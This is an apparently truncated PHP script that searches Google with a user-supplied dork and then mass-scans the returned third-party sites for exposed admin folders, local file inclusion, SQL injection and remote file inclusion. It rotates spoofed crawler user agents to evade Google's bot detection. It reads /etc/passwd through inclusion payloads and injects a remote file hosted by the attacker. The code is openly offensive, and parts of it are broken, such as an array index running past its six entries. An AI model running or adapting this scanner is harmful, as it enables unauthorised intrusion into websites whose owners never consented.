*/
error_reporting(0);
set_time_limit(0);
ini_set('memory_limit', '9999M');
$scan_count = 0;
$success = 0;
$failrate = 0;
$query = stripslashes($_POST['dork']);
if ($query == '') {
echo "
";
}
if ($query != '' ) {
$scan_type = $_POST['vuln_type'];
// useragents to bypass google captcha bullshit and stop google detecting the bot
$agents = array('Yahoo-MMCrawler/3.x (mms dash mmcrawler dash support at yahoo dash inc dot com)',
'Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)',
'YahooFeedSeeker/2.0 (compatible; Mozilla 4.0; MSIE 5.5; http://publisher.yahoo.com/rssguide; users …; views …)',
'Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)',
'Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)',
'Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)');
$rounds = 10 * $how_many;
$started_rounds = 0;
$counted = 10;
while ($started_rounds <= $rounds) {
$counted++;
$rand = rand('0', '23');
$useragent = $agents[$rand];
$transf = curl_init();
curl_setopt($transf, CURLOPT_USERAGENT, $useragent);
curl_setopt($transf, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($transf, CURLOPT_URL, "http://www.google.com/search?q=$query&hl=en&start=$started_rounds&sa=N");
$file = curl_exec($transf);
curl_close($transf);
preg_match_all ("/a[\s]+href[\s]?=[\s\"\']+". "http(.*?)[\"\']+.*?"."/", $file, $ok);
$count = count($ok[1]);
$started_rounds = $started_rounds + 10;
for ($counted = 0; $counted < $count ; $counted++) {
$url = "http" . $ok[1]["$counted"];
$url2 = eregi_replace("http://|https|www.", "", $url);
$total = strlen($url2);
$pos = strpos($url2, "/");
$sum = $total -$pos;
$domain = substr($url2, 0, -$sum);
// filter out the shit... This is your blacklist, be sure to seperate the url, and to eliminate subdomains add the main site and then .site as well
if (eregi("youtube.com|google.com|googleusercontent.com|facebook.com|photobucket.com|.mil|.gov|.edu|.au|.go", $domain))
{
$domain = '';
}
if ($domain != '' && $domain != ':') {
if ($scan_type == 'ADMIN') {
// admin finder
$scan_for = array('admin', 'adm');
$host = $domain;
foreach ($scan_for as $scan){
$scan_count++;
$headers= get_headers("http://$domain/$scan/");
if (eregi('200', $headers[0])) {
echo "
[+]$host/$scan";
$success++;
} else {
echo "
[-]$host/$scan";
$failrate++;
// do something here
}
}
} else {
if ($scan_type == 'LFI') {
if (!eregi("=", $url))
{
$url = '';
}
if ($url != ''){
$scan_count++;
$clean = explode('=', $url);
$test2 = "$clean[0]=$passwd";
$test3 = "$clean[0]=$passwd%00";
$exploit_1 = file_get_contents($test2);
if (eregi("root:x:0", $exploit_1)) {
echo "
[+]$test2";
$success++;
} else {
$exploit_2 = file_get_contents($test3);
if (eregi("root:x:0", $exploit_2)) {
echo "
[+]$test3";
$success++;
} else {
$failrate++;
echo "
[-]$test2";
echo "
[-]$test3";
}
}
}
} else {
if ($scan_type == 'SQLI') {
if (!eregi("=", $url))
{
$url = '';
}
if ($url != ''){
$scan_count++;
$clean = str_replace("=", "='". '"', $url);
$exploit_1 = file_get_contents($clean);
if( preg_match_all("/\b(?:database|fetch|error|MySQL|mysql|SQL|query|Warning)\b/i", strip_tags(html_entity_decode($exploit_1) ) , $useless)) {
echo "
[+]$clean";
$success++;
} else {
echo "
[-]$clean";
$failrate++;
}
}
} else {
if ($scan_type == 'RFI') {
if (!eregi("=", $url))
{
$url = '';
}
if ($url != ''){
$scan_count++;
$clean = explode('=', $url);
$test2 = "$clean[0]=$my_rfi";
$test3 = "$clean[0]=$my_rfi%00";
$exploit_1 = file_get_contents($test2);
if (eregi("Scanned by -null- scanner v2", $exploit_1)) {
echo "
[+]$test2";
$success++;
} else {
$exploit_2 = file_get_contents($test3);
if (eregi("Scanned by -null- scanner v2", $exploit_2)) {
echo "
[+]$test3";
$success++;
} else {
$failrate++;
echo "
[-]$test2";
echo "
[-]$test3";
}
}
}
}
}
}
}
}
}
}
if ($success == '') {
$success = 0;
}
if ($failrate == '') {
$failrate = 0;
}
echo "
Total scanned urls: $scan_count
Successful scans $success
Failed scans $failrate
Search query $query";
}
echo $file;
?>